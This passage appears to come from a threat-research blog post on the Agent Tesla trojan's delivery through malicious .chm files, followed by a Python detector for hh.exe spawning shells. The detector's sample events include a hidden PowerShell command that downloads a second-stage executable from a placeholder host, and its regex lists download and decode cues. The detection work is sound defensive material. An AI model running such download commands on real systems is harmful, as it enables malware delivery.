Agent Tesla is a remote access trojan (RAT) written for the .NET framework that is known to have been in operation since 2014. Threat actors behind this malware have leveraged many different methods to deliver their payload over time, including macro-enabled Word documents, Microsoft Office vulnerabilities, OLE objects and, most recently, compiled HTML help files. Agent Tesla has been in the top 10 most submitted samples in known open malware source repositories in cyber security communities like Malware Bazaar and Any.run. It is a full-featured RAT with multiple ways to exfiltrate organization data through keylogging, screen captures, credential stealing and much more.

In this blog post, the Splunk Threat Research Team (STRT) describes the different tactics, techniques and procedures, mapped to the ATT&CK framework, leveraged by this remote access trojan. Additionally, we highlight the detection analytics we released that can help cyber defenders identify signs of compromise.

Analysis

Identification of Samples

For this analysis, the STRT started the journey with a sample uploaded by JAMESWT_MHT on August 31st to Malware Bazaar. This sample led us to the “ftp-boloni-ma” tag, which groups several samples of a campaign leveraging the Agent Tesla malware. Figure 1.1 shows the list of hashes that have this tag.

Specifically, this campaign used a malicious compiled HTML (.CHM) file as a delivery method to drop and execute its first and second stages and load the remote access trojan. The high-level flow of process execution for this sample is shown in Figure 1.

Security teams that would like to understand how the execution of compiled HTML files looks against their prevention or detection controls should have a look at the AtomicTestHarness for CHM and the Atomic Red Team technique T1218.001 built by the Red Canary team.

This Agent Tesla variant uses a compiled HTML file (.chm) to conceal its malicious code and gain an initial foothold on the victim endpoint. The file has an embedded and obfuscated JavaScript script that invokes PowerShell to download a second stage.
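The CHM-to-PowerShell chain described above is what a defender can hunt for in process-creation telemetry: Windows opens .chm files with hh.exe, so a shell spawned by hh.exe is the signal. The following is an added example, not STRT's released analytics; it assumes Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine) and runs over constructed sample events rather than real telemetry from this campaign.

```python
"""Flag process-creation events where hh.exe (the Windows CHM viewer) spawns a
shell, and rate them higher when the command line carries download/decode cues.
Sample events are constructed here, not real telemetry from the campaign."""
import re
from typing import Dict, List, Optional, Tuple

# Assumption: events use Sysmon Event ID 1 style field names.
EVENTS: List[Dict[str, str]] = [
    # benign: a user opens a help file from Explorer
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Docs\manual.chm'},
    # suspicious: the CHM's script launches a hidden PowerShell to fetch stage 2
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -c "iwr http://stage2.invalid/a -OutFile $env:TEMP\a.exe"'},
    # benign: an administrator runs PowerShell from a console
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-Process"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}
# Cues that a one-liner is fetching or decoding a payload.
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|bitstransfer|-enc(odedcommand)?\b|frombase64string", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a CHM-spawned shell, else None."""
    if basename(ev.get("ParentImage", "")) != "hh.exe":
        return None
    child = basename(ev.get("Image", ""))
    if child not in SHELLS:
        return None
    if DOWNLOAD_CUES.search(ev.get("CommandLine", "")):
        return ("high", f"hh.exe spawned {child} with a download/decode cue")
    return ("medium", f"hh.exe spawned {child}")

def detect(events: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Scan events; return (index, severity, reason) for each hit."""
    return [(i, *v) for i, ev in enumerate(events) if (v := classify(ev))]

if __name__ == "__main__":
    for idx, sev, why in detect(EVENTS):
        print(f"[{sev}] event {idx}: {why}")
```

Running it flags only the second constructed event as high severity; the benign hh.exe launch and the console PowerShell session produce no hit.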